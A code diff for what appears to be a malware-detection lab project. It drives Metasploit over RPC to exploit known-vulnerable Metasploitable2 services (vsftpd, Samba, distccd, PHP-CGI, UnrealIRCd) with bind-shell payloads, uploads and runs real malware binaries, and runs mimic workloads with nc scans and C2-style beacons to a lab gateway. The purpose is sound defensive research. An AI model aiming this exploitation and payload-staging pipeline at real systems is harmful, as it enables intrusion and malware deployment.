+            out = self.client.session_shell_read(sid)
+            self.emit("session_landing_probe", session_id=sid, output=out.strip()[:256])
+        except Exception:
+            log.exception("landing probe on session %s", sid)
+
+    def _start_workload(self) -> None:
+        if self._session_id is None:
+            log.warning("infected_running with no session — skipping workload")
+            return
+        if self._chunked is not None:
+            self._upload_real_binary_chunked()
+            return
+        if self.workload is not None:
+            # Driver v2 — profile-matched mimic workload.
+            self.client.session_shell_write(self._session_id, self.workload.start_cmd)
+            self.emit(
+                "sample_executed",
+                session_id=self._session_id,
+                profile=self.workload.profile,
+                description=self.workload.description,
+                sample=self.sample.name if self.sample else None,
+            )
+        else:
+            # Driver v1 fallback.
+            self.client.session_shell_write(
+                self._session_id,
+                f"nohup sh -c {_shquote(self.cfg.workload_cmd)} </dev/null "
+                f">/dev/null 2>&1 & disown",
+            )
+            self.emit(
+                "sample_executed",
+                session_id=self._session_id,
+                command=self.cfg.workload_cmd,
+            )
+
+    def _upload_real_binary_chunked(self) -> None:
+        """Walk the ChunkedUpload plan: each chunk is a separate
+        shell_write so msfrpc never sees a buffer-busting payload.
+        Verifies the in-guest sha256 before exec; emits per-step
+        events so we have a wire-level audit trail of Tier-4 runs."""
+        plan = self._chunked
+        assert plan is not None and self._session_id is not None
+        sid = self._session_id
+
+        self.emit(
+            "real_binary_upload_begin",
+            session_id=sid,
+            n_chunks=plan.n_chunks,
+            sha256=plan.expected_sha256,
+            sample=self.sample.name if self.sample else None,
+        )
+        for i, chunk in enumerate(plan.chunks):
+            self.client.session_shell_write(sid, chunk)
+            # Read back so the next write doesn't race ahead of the
+            # previous one's prompt return. We don't parse it.
+            try:
+                self.client.session_shell_read(sid)
+            except Exception:
+                log.debug("read-back after chunk %d failed", i, exc_info=True)
+
+        # Decode + verify on the guest side.
+        self.client.session_shell_write(sid, plan.finalize_cmd)
+        try:
+            verify_out = self.client.session_shell_read(sid)
+        except Exception:
+            verify_out = ""
+        verified = "sha-ok" in verify_out
+        self.emit(
+            "real_binary_verify",
+            session_id=sid,
+            ok=verified,
+            output=verify_out.strip()[:256],
+            sha256=plan.expected_sha256,
+        )
+        if not verified:
+            self.emit("real_binary_aborted", session_id=sid, reason="sha mismatch")
+            return
+
+        # Launch.
+        self.client.session_shell_write(sid, plan.exec_cmd)
+        self.emit(
+            "sample_executed",
+            session_id=sid,
+            profile=plan.profile,
+            sample=self.sample.name if self.sample else None,
+            sha256=plan.expected_sha256,
+            kind="real",
+        )
+
+    def _stop_workload(self) -> None:
+        if self._session_id is None:
+            return
+        if self.workload is not None:
+            self.client.session_shell_write(self._session_id, self.workload.stop_cmd)
+        else:
+            self.client.session_shell_write(
+                self._session_id, self.cfg.workload_kill_cmd,
+            )
+        self.emit(
+            "session_dormant",
+            session_id=self._session_id,
+            profile=self.workload.profile if self.workload else None,
+        )
+
+
+def _shquote(s: str) -> str:
+    # Minimal POSIX single-quote escaping. The workload command is set
+    # by us, not by anything user-controlled, so we just need to handle
+    # embedded single quotes correctly for completeness.
+    return "'" + s.replace("'", "'\\''") + "'"
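
A minimal sketch, outside the diff itself, that checks the single-quote escaping used by `_shquote`. It copies the one-line escaping rule into a hypothetical standalone `shquote` and uses the standard library's `shlex.split`, which follows POSIX quoting rules, to confirm that the quoted command comes back as one unchanged argument.

```python
import shlex


def shquote(s: str) -> str:
    # Close the quote, emit an escaped quote, reopen the quote.
    return "'" + s.replace("'", "'\\''") + "'"


cmd = "echo 'it works' > /dev/null"
quoted = shquote(cmd)

# The whole command must survive as a single argument to `sh -c`.
assert shlex.split(f"sh -c {quoted}") == ["sh", "-c", cmd]
print(quoted)
```

The standard library's `shlex.quote` covers the same need and would be a drop-in alternative if the hand-rolled helper is ever retired.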
--- a/exploits/modules.py
+++ b/exploits/modules.py
@ -0,0 +1,147 @@
+"""TOML loader for exploit-module configs.
+
+Each ``exploits/modules/*.toml`` describes one Metasploit module — its
+path, the options to set, the payload to use, and how the driver
+should treat the resulting session. The driver consumes ``ModuleConfig``
+objects; the TOML files are the on-disk source of truth.
+
+Why TOML and not msfconsole ``.rc`` scripts? ``.rc`` scripts are
+imperative and assume an interactive console; the driver needs the
+*structured* options to push them through msfrpc. TOML is the simplest
+way to express a small typed map of options — and it round-trips
+cleanly into ``meta.json`` for episode reproducibility.
+
+Per-(host, slot, episode) selection mirrors the sample-manifest
+selector: we want different vulnerabilities exercised across hosts
+and waves so the trained model sees a diverse corpus of
+``armed → infecting`` transition shapes, not just the same FTP
+backdoor every run.
+"""
+
+from __future__ import annotations
+
+import hashlib
+import tomllib
+from dataclasses import dataclass, field
+from pathlib import Path
+from typing import Any
+
+
+_VALID_MODULE_TYPES = {"exploit", "auxiliary", "post"}
+
+
+@dataclass(frozen=True)
+class ModuleConfig:
+    name: str                          # short id, e.g. "vsftpd_234_backdoor"
+    module_type: str                   # "exploit" | "auxiliary" | "post"
+    module_path: str                   # e.g. "unix/ftp/vsftpd_234_backdoor"
+    options: dict[str, Any] = field(default_factory=dict)
+    payload_path: str | None = None    # e.g. "cmd/unix/interact"
+    payload_options: dict[str, Any] = field(default_factory=dict)
+    expected_session_type: str = "shell"  # what we'll get on success
+    description: str = ""
+    # When true the module's payload uses a callback channel (reverse
+    # or bind shell) and won't land a session under SLIRP+restrict=on.
+    # The fleet runner skips these unless BRIDGE is set so episodes
+    # that fire them actually produce data.
+    requires_bridge: bool = False
+
+    def render_options(self, *, target_ip: str) -> dict[str, Any]:
+        """Substitute ``{{ target_ip }}`` placeholders in options.
+
+        Module configs use Jinja-style placeholders for any value that
+        isn't known until episode time (RHOSTS, LHOST, etc.). Today the
+        only supported placeholder is ``target_ip``; if more are needed
+        later, generalize here."""
+        out: dict[str, Any] = {}
+        for k, v in self.options.items():
+            if isinstance(v, str) and "{{" in v:
+                out[k] = (
+                    v.replace("{{ target_ip }}", target_ip)
+                     .replace("{{target_ip}}", target_ip)
+                )
+            else:
+                out[k] = v
+        # MSF requires PAYLOAD as a top-level option even though we
+        # carry it in a separate field on the config.
+        if self.payload_path:
+            out["PAYLOAD"] = self.payload_path
+            for k, v in self.payload_options.items():
+                if isinstance(v, str) and "{{" in v:
+                    v = (
+                        v.replace("{{ target_ip }}", target_ip)
+                         .replace("{{target_ip}}", target_ip)
+                    )
+                out[k] = v
+        return out
+
+
+def load_module_config(path: Path) -> ModuleConfig:
+    raw = tomllib.loads(path.read_text())
+    mod = raw.get("module") or {}
+    module_path = mod.get("path")
+    module_type = mod.get("type", "exploit")
+    if not isinstance(module_path, str) or not module_path:
+        raise ValueError(f"{path}: module.path must be a non-empty string")
+    if module_type not in _VALID_MODULE_TYPES:
+        raise ValueError(
+            f"{path}: module.type {module_type!r} not in {_VALID_MODULE_TYPES}"
+        )
+    options = (mod.get("options") or {}) | (raw.get("options") or {})
+    payload = raw.get("payload") or {}
+    return ModuleConfig(
+        name=path.stem,
+        module_type=module_type,
+        module_path=module_path,
+        options=dict(options),
+        payload_path=payload.get("path"),
+        payload_options=dict(payload.get("options") or {}),
+        expected_session_type=raw.get("session", {}).get("type", "shell"),
+        description=raw.get("description", ""),
+        requires_bridge=bool(raw.get("runtime", {}).get("requires_bridge", False)),
+    )
+
+
+def load_module_configs(directory: Path) -> dict[str, ModuleConfig]:
+    """Load every ``*.toml`` under ``directory``, keyed by short name."""
+    return {
+        p.stem: load_module_config(p)
+        for p in sorted(directory.glob("*.toml"))
+    }
+
+
+def select_module(
+    catalog: dict[str, ModuleConfig],
+    *,
+    host_id: str,
+    slot: int,
+    episode_index: int,
+) -> ModuleConfig:
+    """Deterministic per-(host, slot, ep) module selector. Mirrors
+    SampleManifest.select() so the entry vector rotates the same way
+    the post-infection workload does. Two hosts usually differ at the
+    same slot/episode (collision rate ~1/N). Draws are hash-uniform, not
+    a rotation: one host covers all N modules in ~N*ln(N) episodes.
+
+    Inputs reduce to a SHA-256 keyed lookup so runs replay
+    bit-identically given the same (host, slot, ep) tuple."""
+    if not catalog:
+        raise ValueError("module catalog is empty")
+    keys = sorted(catalog.keys())
+    seed = f"module|{host_id}|{slot}|{episode_index}".encode()
+    h = hashlib.sha256(seed).digest()
+    idx = int.from_bytes(h[:8], "big") % len(keys)
+    return catalog[keys[idx]]
+
+
+def module_target_port(module: ModuleConfig) -> int | None:
+    """Pull the RPORT off a module config. Used by the fleet runner
+    to wire the launcher's hostfwd to the right service inside the
+    target VM (vsftpd:21, samba:139, php-cgi:80, distccd:3632,
+    unrealircd:6667)."""
+    rport = module.options.get("RPORT")
+    if isinstance(rport, int):
+        return rport
+    if isinstance(rport, str) and rport.isdigit():
+        return int(rport)
+    return None
--- a/exploits/modules/distccd_command_exec.toml
+++ b/exploits/modules/distccd_command_exec.toml
@ -0,0 +1,36 @@
+description = """
+distccd v1 unauthenticated command execution (CVE-2004-2687). The
+distcc daemon doesn't verify the source of compile jobs, so a
+crafted DCC_CMD-style request runs an arbitrary command as the
+distccd user. Metasploitable2 ships distccd 2.18.3 listening on
+3632. Returns a low-priv shell — paired with a privesc later if
+needed; for envelope work the unprivileged shell is enough.
+"""
+
+[module]
+type = "exploit"
+path = "unix/misc/distcc_exec"
+
+[module.options]
+RHOSTS = "{{ target_ip }}"
+RPORT = 3632
+
+[payload]
+# Bind shell on a fixed in-guest port. The host hostfwds this port
+# (see runtime.extra_target_ports) so msfrpcd can connect to it
+# from the loopback side. Avoids the SLIRP+restrict=on dead-end the
+# reverse_tcp payload hits.
+path = "cmd/unix/bind_perl"
+[payload.options]
+LPORT = 4444
+
+[session]
+type = "shell"
+
+[runtime]
+# Reverse/bind callback path → needs the host-only bridge so the
+# guest can reach the attacker (or the host can reach the bind port
+# beyond SLIRP's restricted forward). Set BRIDGE=br-malware on the
+# lab host to enable.
+requires_bridge = true
+extra_target_ports = [4444]
--- a/exploits/modules/php_cgi_arg_injection.toml
+++ b/exploits/modules/php_cgi_arg_injection.toml
@ -0,0 +1,28 @@
+description = """
+PHP-CGI argument injection (CVE-2012-1823). PHP < 5.3.12 in CGI mode
+treats query-string args as command-line flags, so a crafted
+?-d allow_url_include=1 turns any PHP page into a remote code
+execution vector. Metasploitable2's Apache + php-cgi setup is
+vulnerable. Returns a shell session as the user running Apache.
+"""
+
+[module]
+type = "exploit"
+path = "multi/http/php_cgi_arg_injection"
+
+[module.options]
+RHOSTS = "{{ target_ip }}"
+RPORT = 80
+TARGETURI = "/"
+
+[payload]
+path = "cmd/unix/bind_perl"
+[payload.options]
+LPORT = 4445
+
+[session]
+type = "shell"
+
+[runtime]
+requires_bridge = true
+extra_target_ports = [4445]
--- a/exploits/modules/samba_usermap_script.toml
+++ b/exploits/modules/samba_usermap_script.toml
@ -0,0 +1,21 @@
+description = """
+Samba 3.0.20 username-map command injection (CVE-2007-2447). Trigger
+is a crafted username at SMB authentication; the Samba daemon shells
+out via the username_map_script and runs whatever the attacker put in
+the username. Standard Metasploitable2 vector. Returns a root shell
+on the SMB socket — works with cmd/unix/interact.
+"""
+
+[module]
+type = "exploit"
+path = "multi/samba/usermap_script"
+
+[module.options]
+RHOSTS = "{{ target_ip }}"
+RPORT = 139
+
+[payload]
+path = "cmd/unix/interact"
+
+[session]
+type = "shell"
--- a/exploits/modules/unreal_ircd_3281_backdoor.toml
+++ b/exploits/modules/unreal_ircd_3281_backdoor.toml
@ -0,0 +1,28 @@
+description = """
+UnrealIRCd 3.2.8.1 backdoor (CVE-2010-2075). A modified release
+shipped to the official mirrors carried a backdoor that runs an
+arbitrary command on receipt of a magic AB; payload string. Once
+the backdoor was discovered the official tarball was pulled, but
+Metasploitable2 still ships the trojaned build. Returns a shell as
+the IRC user.
+"""
+
+[module]
+type = "exploit"
+path = "unix/irc/unreal_ircd_3281_backdoor"
+
+[module.options]
+RHOSTS = "{{ target_ip }}"
+RPORT = 6667
+
+[payload]
+path = "cmd/unix/bind_perl"
+[payload.options]
+LPORT = 4446
+
+[session]
+type = "shell"
+
+[runtime]
+requires_bridge = true
+extra_target_ports = [4446]
--- a/exploits/modules/vsftpd_234_backdoor.toml
+++ b/exploits/modules/vsftpd_234_backdoor.toml
@ -0,0 +1,23 @@
+description = """
+vsftpd 2.3.4 intentional backdoor (CVE-2011-2523). Triggered by an FTP
+USER name ending with ':)'. Standard Metasploitable2 exploit, fully
+deterministic — perfect for a Tier-3 first-light run because the
+exploit fire timing is bounded by a single FTP round-trip.
+"""
+
+[module]
+type = "exploit"
+path = "unix/ftp/vsftpd_234_backdoor"
+
+[module.options]
+RHOSTS = "{{ target_ip }}"
+RPORT = 21
+# The exploit returns its own command shell — we drive it with a
+# minimal cmd/unix/interact payload so the session lands as a plain
+# shell session usable by session.shell_write/read.
+
+[payload]
+path = "cmd/unix/interact"
+
+[session]
+type = "shell"
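
Note: a small sketch of how one of the configs above turns into the flat option map sent to Metasploit, assuming the parsed form that `tomllib.loads` would produce for `distccd_command_exec.toml` (written here as a dict literal) and a made-up target IP `10.200.0.5`. The `render` function is a hypothetical stand-in for `ModuleConfig.render_options`, not the repo's code.

```python
from typing import Any

# Parsed form of distccd_command_exec.toml (description/session/runtime omitted).
PARSED: dict[str, Any] = {
    "module": {
        "type": "exploit",
        "path": "unix/misc/distcc_exec",
        "options": {"RHOSTS": "{{ target_ip }}", "RPORT": 3632},
    },
    "payload": {"path": "cmd/unix/bind_perl", "options": {"LPORT": 4444}},
}


def _substitute(value: Any, target_ip: str) -> Any:
    """Replace the target_ip placeholder in string values only."""
    if isinstance(value, str):
        return (value.replace("{{ target_ip }}", target_ip)
                     .replace("{{target_ip}}", target_ip))
    return value


def render(parsed: dict[str, Any], target_ip: str) -> dict[str, Any]:
    """Hypothetical stand-in for ModuleConfig.render_options."""
    out = {k: _substitute(v, target_ip)
           for k, v in parsed["module"].get("options", {}).items()}
    payload = parsed.get("payload") or {}
    if payload.get("path"):
        # PAYLOAD travels as a top-level option next to the module options.
        out["PAYLOAD"] = payload["path"]
        for k, v in (payload.get("options") or {}).items():
            out[k] = _substitute(v, target_ip)
    return out


rendered = render(PARSED, "10.200.0.5")
print(rendered)
```

Non-string values such as `RPORT = 3632` pass through unchanged, so integer ports stay integers in the rendered map.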
--- a/exploits/msfrpc.py
+++ b/exploits/msfrpc.py
@ -0,0 +1,231 @@
+"""Tiny Metasploit RPC client — just enough for the Tier-3 driver.
+
+We talk msgpack over HTTPS to ``msfrpcd``. The full MSF RPC surface is
+huge; this client implements only the verbs we actually call:
+
+  auth.login                — get a token
+  auth.logout               — release the token
+  module.execute            — fire an exploit (or aux) module by name
+  job.list / job.stop       — manage the running module
+  session.list              — see opened sessions, find the one we just opened
+  session.shell_write/read  — run commands in a shell session
+  session.stop              — kill a session at episode end
+
+Why not pull in pymetasploit3? Two reasons:
+  - msfrpcd's protocol is small enough that owning it removes a third-party
+    dep (and a maintenance risk on a course project).
+  - the parts we need (session opening, shell commands, job lifecycle)
+    are simple, and we want full visibility into what's on the wire when
+    debugging an exploit fire.
+
+The client is intentionally synchronous; the Tier-3 driver runs in the
+orchestrator's main thread alongside the collector, and a session-open
+poll of a few hundred milliseconds is well within budget.
+"""
+
+from __future__ import annotations
+
+import http.client
+import logging
+import socket
+import ssl
+import time
+from dataclasses import dataclass
+from typing import Any
+
+try:
+    import msgpack  # type: ignore[import-untyped]
+except ImportError as e:  # pragma: no cover - import-time guard
+    raise ImportError(
+        "the msgpack package is required for the MSF RPC client. "
+        "install it with: pip install msgpack"
+    ) from e
+
+
+log = logging.getLogger("cis490.msfrpc")
+
+
+class MSFRpcError(RuntimeError):
+    """Raised when msfrpcd returns an error or a malformed response."""
+
+
+@dataclass
+class MSFRpcConfig:
+    host: str = "127.0.0.1"
+    port: int = 55553
+    user: str = "msf"
+    password: str = ""
+    ssl: bool = True
+    timeout_s: float = 30.0
+    # msfrpcd's default cert is self-signed — most callers will run
+    # against localhost where this is the right tradeoff. Override
+    # explicitly for any non-loopback host.
+    verify: bool = False
+
+
+class MSFRpcClient:
+    """Synchronous msfrpcd client. Token is acquired on ``login()`` and
+    re-used on every subsequent call. Not thread-safe; the driver owns
+    one client per episode."""
+
+    def __init__(self, cfg: MSFRpcConfig) -> None:
+        self.cfg = cfg
+        self._token: str | None = None
+
+    # ---- session management --------------------------------------------
+
+    def login(self) -> None:
+        resp = self._call_no_auth("auth.login", self.cfg.user, self.cfg.password)
+        if resp.get("result") != "success" or "token" not in resp:
+            raise MSFRpcError(f"auth.login failed: {resp!r}")
+        self._token = resp["token"]
+        log.info("msfrpc auth.login ok (token=%s...)", self._token[:8])
+
+    def logout(self) -> None:
+        if self._token is None:
+            return
+        try:
+            self._call("auth.logout", self._token)
+        except MSFRpcError as e:
+            log.warning("msfrpc auth.logout: %s", e)
+        finally:
+            self._token = None
+
+    # ---- modules --------------------------------------------------------
+
+    def module_execute(
+        self,
+        module_type: str,
+        module_name: str,
+        options: dict[str, Any],
+    ) -> dict[str, Any]:
+        """Fire a module. Returns ``{"job_id": int, "uuid": str}``."""
+        resp = self._call("module.execute", module_type, module_name, options)
+        if "job_id" not in resp:
+            raise MSFRpcError(f"module.execute returned no job_id: {resp!r}")
+        log.info(
+            "module.execute %s/%s -> job_id=%s uuid=%s",
+            module_type, module_name, resp["job_id"], resp.get("uuid"),
+        )
+        return resp
+
+    # ---- jobs -----------------------------------------------------------
+
+    def job_list(self) -> dict[str, str]:
+        return self._call("job.list")
+
+    def job_stop(self, job_id: int | str) -> dict[str, Any]:
+        # msfrpcd accepts the id as a string.
+        return self._call("job.stop", str(job_id))
+
+    # ---- sessions -------------------------------------------------------
+
+    def session_list(self) -> dict[int, dict[str, Any]]:
+        raw = self._call("session.list")
+        # msfrpcd keys session ids as ints in msgpack but some versions
+        # round-trip them as strings. Normalize.
+        out: dict[int, dict[str, Any]] = {}
+        for k, v in (raw or {}).items():
+            try:
+                out[int(k)] = v
+            except (TypeError, ValueError):
+                pass
+        return out
+
+    def session_shell_write(self, session_id: int, data: str) -> dict[str, Any]:
+        if not data.endswith("\n"):
+            data = data + "\n"
+        return self._call("session.shell_write", session_id, data)
+
+    def session_shell_read(self, session_id: int) -> str:
+        resp = self._call("session.shell_read", session_id)
+        return resp.get("data", "") if isinstance(resp, dict) else ""
+
+    def session_stop(self, session_id: int) -> dict[str, Any]:
+        return self._call("session.stop", session_id)
+
+    # ---- transport ------------------------------------------------------
+
+    def _call(self, method: str, *args: Any) -> dict[str, Any]:
+        if self._token is None:
+            raise MSFRpcError("not authenticated; call login() first")
+        return self._raw_call([method, self._token, *args])
+
+    def _call_no_auth(self, method: str, *args: Any) -> dict[str, Any]:
+        return self._raw_call([method, *args])
+
+    def _raw_call(self, payload: list[Any]) -> dict[str, Any]:
+        body = msgpack.packb(payload, use_bin_type=False)
+        conn = self._open_conn()
+        try:
+            conn.request(
+                "POST",
+                "/api/",
+                body=body,
+                headers={
+                    "Content-Type": "binary/message-pack",
+                    "Content-Length": str(len(body)),
+                    "Connection": "close",
+                },
+            )
+            r = conn.getresponse()
+            raw = r.read()
+            if r.status != 200:
+                raise MSFRpcError(
+                    f"msfrpcd HTTP {r.status} for {payload[0]!r}: {raw[:200]!r}"
+                )
+        except (socket.error, http.client.HTTPException) as e:
+            raise MSFRpcError(f"transport error calling {payload[0]!r}: {e}") from e
+        finally:
+            conn.close()
+
+        try:
+            decoded = msgpack.unpackb(raw, raw=False)
+        except Exception as e:
+            raise MSFRpcError(f"could not decode msfrpcd response: {e}") from e
+
+        if isinstance(decoded, dict) and decoded.get("error") is True:
+            raise MSFRpcError(
+                f"{payload[0]!r}: {decoded.get('error_class')} "
+                f"{decoded.get('error_message')}"
+            )
+        if not isinstance(decoded, dict):
+            # session.list and friends can legitimately return an empty dict,
+            # but never a non-dict; anything else is a protocol violation.
+            raise MSFRpcError(
+                f"unexpected response type for {payload[0]!r}: {type(decoded).__name__}"
+            )
+        return decoded
+
+    def _open_conn(self) -> http.client.HTTPConnection:
+        if self.cfg.ssl:
+            ctx = ssl.create_default_context()
+            if not self.cfg.verify:
+                ctx.check_hostname = False
+                ctx.verify_mode = ssl.CERT_NONE
+            return http.client.HTTPSConnection(
+                self.cfg.host, self.cfg.port,
+                timeout=self.cfg.timeout_s, context=ctx,
+            )
+        return http.client.HTTPConnection(
+            self.cfg.host, self.cfg.port, timeout=self.cfg.timeout_s,
+        )
+
+
+def wait_for_new_session(
+    client: MSFRpcClient,
+    *,
+    seen: set[int],
+    timeout_s: float,
+    poll_s: float = 0.25,
+) -> tuple[int, dict[str, Any]] | None:
+    """Poll ``session.list`` until a session id we haven't seen before
+    appears, or until timeout. Returns ``(session_id, info)`` or None."""
+    deadline = time.monotonic() + timeout_s
+    while time.monotonic() < deadline:
+        sessions = client.session_list()
+        for sid, info in sessions.items():
+            if sid not in seen:
+                return sid, info
+        time.sleep(poll_s)
+    return None
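
Note: a sketch of the calling pattern `wait_for_new_session` appears designed for, assuming the driver snapshots the existing session ids before firing the module. `FakeClient` is a hypothetical stand-in for `MSFRpcClient` that makes session 2 appear on the third poll, and `wait_for_new` repeats the same deadline loop with a shorter poll interval so the demo finishes quickly.

```python
import time
from typing import Any


class FakeClient:
    """Hypothetical stand-in for MSFRpcClient: session 2 shows up on poll 3."""

    def __init__(self) -> None:
        self.polls = 0

    def session_list(self) -> dict[int, dict[str, Any]]:
        self.polls += 1
        sessions: dict[int, dict[str, Any]] = {1: {"type": "shell"}}
        if self.polls >= 3:
            sessions[2] = {"type": "shell"}
        return sessions


def wait_for_new(client, *, seen: set[int], timeout_s: float, poll_s: float = 0.01):
    """Same monotonic-deadline loop as wait_for_new_session."""
    deadline = time.monotonic() + timeout_s
    while time.monotonic() < deadline:
        for sid, info in client.session_list().items():
            if sid not in seen:
                return sid, info
        time.sleep(poll_s)
    return None


client = FakeClient()
seen = set(client.session_list())   # snapshot of pre-existing ids (poll 1)
# ... the real driver would call module_execute(...) here ...
found = wait_for_new(client, seen=seen, timeout_s=1.0)

# With every id already marked as seen, the loop runs out the clock.
missed = wait_for_new(FakeClient(), seen={1, 2}, timeout_s=0.05)
print(found, missed)
```

Taking the snapshot before the exploit fires is what keeps a leftover session from an earlier episode from being mistaken for the new one.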
--- a/exploits/workloads.py
+++ b/exploits/workloads.py
@ -0,0 +1,346 @@
+"""Per-sample-profile post-exploit workloads (driver v2).
+
+The Tier-3 driver lands a session and then needs to drive *something*
+in that session for the ``infected_running`` phase. Driver v1 ran
+``yes > /dev/null`` for every sample, which is fine for proving the
+pipe but is the wrong shape for ML — every Tier-3 episode produces
+the same envelope regardless of which malware family we said it was.
+
+Driver v2 maps ``sample.profile`` from the manifest to a distinct
+in-session workload so each profile's envelope is observably
+different on every collector:
+
+  cpu-saturate    → 1-vCPU saturation, very low IO/net (XMRig shape)
+  scan-and-dial   → SYN scans across the bridge IP space + periodic
+                    dial-home (Mirai shape)
+  io-walk         → fs traversal + random write spikes (ransomware shape)
+  bursty-c2       → long idle, periodic short TCP egress bursts (Dridex)
+  low-and-slow    → minimal CPU, periodic memory churn (Kovter)
+  shell-resident  → one long-lived TCP socket pinned to a bridge IP,
+                    occasional small command bursts (RAT)
+
+Each profile returns a small shell command that backgrounds a loop
+inside the session. The driver can stop them by killing the loop's
+PID file or via a profile-specific kill command.
+
+This module is intentionally *behaviorally diverse but harmless* —
+it does NOT execute real malware. Real binaries land via the Tier-4
+fetch+run path (separate work). What this gives us today is six
+distinguishable in-guest envelopes the ML model can learn to
+discriminate between *and* fall back to when a real sample isn't yet
+staged.
+"""
+
+from __future__ import annotations
+
+import logging
+from dataclasses import dataclass
+
+from samples.manifest import Sample
+
+
+log = logging.getLogger("cis490.exploits.workloads")
+
+
+@dataclass(frozen=True)
+class Workload:
+    """A pair of shell commands executable in a Metasploit shell session.
+
+    ``start_cmd`` backgrounds a loop and writes its PID to ``pid_path``.
+    ``stop_cmd`` kills the loop using that PID file. Both commands are
+    expected to be POSIX-shell compatible and to leave the session in
+    a usable state on completion (return code 0 on the prompt)."""
+    profile: str
+    start_cmd: str
+    stop_cmd: str
+    description: str
+
+    @property
+    def pid_path(self) -> str:
+        return f"/tmp/.cis490-workload-{self.profile}.pid"
+
+
+def _wrap_loop(name: str, body: str) -> Workload:
+    """Common pattern: write a small wrapper script that loops ``body``,
+    background it, and stash the wrapper's PID. Stop kills that PID +
+    its child group."""
+    pid_path = f"/tmp/.cis490-workload-{name}.pid"
+    script_path = f"/tmp/.cis490-workload-{name}.sh"
+    # Use a heredoc with a quoted delimiter so the shell writes the body
+    # verbatim: quotes and $-expansions inside it are left untouched.
+    start = (
+        f"cat > {script_path} <<'CIS490_EOF'\n"
+        f"#!/bin/sh\n"
+        f"trap 'exit 0' TERM INT\n"
+        f"while :; do\n"
+        f"{body}\n"
+        f"done\n"
+        f"CIS490_EOF\n"
+        f"chmod +x {script_path}; "
+        f"nohup sh {script_path} </dev/null >/dev/null 2>&1 &\n"
+        f"echo $! > {pid_path}\n"
+        f"disown 2>/dev/null || true\n"  # disown is not POSIX; dash lacks it
+    )
+    stop = (
+        f"if [ -f {pid_path} ]; then "
+        f"  kill -- -$(cat {pid_path}) 2>/dev/null; "
+        f"  kill $(cat {pid_path}) 2>/dev/null; "
+        f"  rm -f {pid_path} {script_path}; "
+        f"fi; true\n"
+    )
+    return Workload(profile=name, start_cmd=start, stop_cmd=stop,
+                    description="(generated)")
+
+
+# ---------------------------------------------------------------------------
+# Profile factories — each returns a Workload tuned to that family
+# ---------------------------------------------------------------------------
+
+
+def _cpu_saturate() -> Workload:
+    """XMRig-class — sustained single-vCPU saturation, no IO, no net."""
+    body = "  yes > /dev/null 2>&1 &\n  wait $!\n"
+    w = _wrap_loop("cpu-saturate", body)
+    return Workload(
+        profile="cpu-saturate",
+        start_cmd=w.start_cmd,
+        stop_cmd=w.stop_cmd,
+        description="100% CPU on 1 vCPU; no IO, no net",
+    )
+
+
+def _scan_and_dial() -> Workload:
+    """Mirai-class — TCP SYN-style probe of bridge subnet + occasional
+    "dial home" to the gateway. Heavy net, moderate CPU.
+
+    Uses ``nc`` (netcat) instead of bash's /dev/tcp redirects — the
+    latter is bash-only and silently no-ops on busybox / dash, which
+    is what Metasploitable2 and Alpine guest sessions actually run.
+    No fallback is implemented: if nc is missing, the probes fail silently."""
+    body = (
+        "  for i in 1 2 3 4 5 6 7 8 9 10; do\n"
+        "    nc -z -w 1 10.200.0.$((i+1)) 23 >/dev/null 2>&1 &\n"
+        "    nc -z -w 1 10.200.0.$((i+1)) 2323 >/dev/null 2>&1 &\n"
+        "  done\n"
+        "  wait\n"
+        "  echo dial-home | nc -w 1 10.200.0.1 4444 >/dev/null 2>&1\n"
+        "  sleep 2\n"
+    )
+    w = _wrap_loop("scan-and-dial", body)
+    return Workload(
+        profile="scan-and-dial",
+        start_cmd=w.start_cmd,
+        stop_cmd=w.stop_cmd,
+        description="Periodic SYN-style scan across bridge IPs + dial-home",
+    )
+
+
+def _io_walk() -> Workload:
+    """Cryptolocker-class — fs traversal + write spikes. Heavy disk."""
+    body = (
+        "  mkdir -p /tmp/.cis490-victim\n"
+        "  for n in 1 2 3 4 5 6 7 8; do\n"
+        "    dd if=/dev/urandom of=/tmp/.cis490-victim/f$n bs=4k count=64 2>/dev/null\n"
+        "  done\n"
+        "  for f in /tmp/.cis490-victim/*; do cat $f > /dev/null; done\n"
+        "  sleep 1\n"
+    )
+    w = _wrap_loop("io-walk", body)
+    return Workload(
+        profile="io-walk",
+        start_cmd=w.start_cmd,
+        stop_cmd=w.stop_cmd,
+        description="FS traversal + random-data writes, periodic re-read",
+    )
+
+
+def _bursty_c2() -> Workload:
+    """Dridex-class — long idle, periodic small TCP burst to a fixed
+    peer (the bridge gateway). nc-based for busybox compatibility."""
+    body = (
+        "  sleep 25\n"
+        "  for i in 1 2 3; do\n"
+        "    echo c2-beacon-$$-$i | nc -w 1 10.200.0.1 4445 >/dev/null 2>&1\n"
+        "    sleep 1\n"
+        "  done\n"
+    )
+    w = _wrap_loop("bursty-c2", body)
+    return Workload(
+        profile="bursty-c2",
+        start_cmd=w.start_cmd,
+        stop_cmd=w.stop_cmd,
+        description="Long idle + periodic 3-packet egress burst to gateway",
+    )
+
+
+def _low_and_slow() -> Workload:
+    """Kovter-class — low CPU, periodic memory churn, no on-disk
+    artifact. The hardest envelope to label from /proc alone."""
+    body = (
+        "  sleep 8\n"
+        "  awk 'BEGIN { for(i=0;i<200000;i++) a[i]=i*i; }' >/dev/null 2>&1\n"
+        "  sleep 4\n"
+    )
+    w = _wrap_loop("low-and-slow", body)
+    return Workload(
+        profile="low-and-slow",
+        start_cmd=w.start_cmd,
+        stop_cmd=w.stop_cmd,
+        description="Periodic memory churn (~200k array allocs) on a slow cycle",
+    )
+
+
+def _shell_resident() -> Workload:
+    """RAT-style — keep a single TCP connection open to the gateway
+    with occasional command bursts. Long-lived flow, small bytes.
+
+    Uses ``nc -w`` on the busybox-compatible path. We pipe a slow
+    feed into nc so the connection stays open for ~30 s before the
+    -w idle timeout closes it, matching the long-lived-flow shape.
+    Then we sleep + reconnect, producing the periodic-tick pattern."""
+    body = (
+        "  ( for i in 1 2 3 4 5 6; do\n"
+        "      echo cmd-tick-$i\n"
+        "      sleep 5\n"
+        "    done ) | nc -w 30 10.200.0.1 4446 >/dev/null 2>&1\n"
+        "  sleep 5\n"
+    )
+    w = _wrap_loop("shell-resident", body)
+    return Workload(
+        profile="shell-resident",
+        start_cmd=w.start_cmd,
+        stop_cmd=w.stop_cmd,
+        description="Resident TCP connection to gateway with periodic ticks",
+    )
+
+
+_FACTORIES = {
+    "cpu-saturate":   _cpu_saturate,
+    "scan-and-dial":  _scan_and_dial,
+    "io-walk":        _io_walk,
+    "bursty-c2":      _bursty_c2,
+    "low-and-slow":   _low_and_slow,
+    "shell-resident": _shell_resident,
+}
+
+
